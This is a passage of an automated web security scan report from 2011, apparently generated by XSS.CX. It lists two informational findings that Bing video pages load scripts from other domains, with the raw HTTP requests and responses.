<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.8. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.9. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

Report generated by XSS.CX at Sun Feb 13 07:57:11 CST 2011.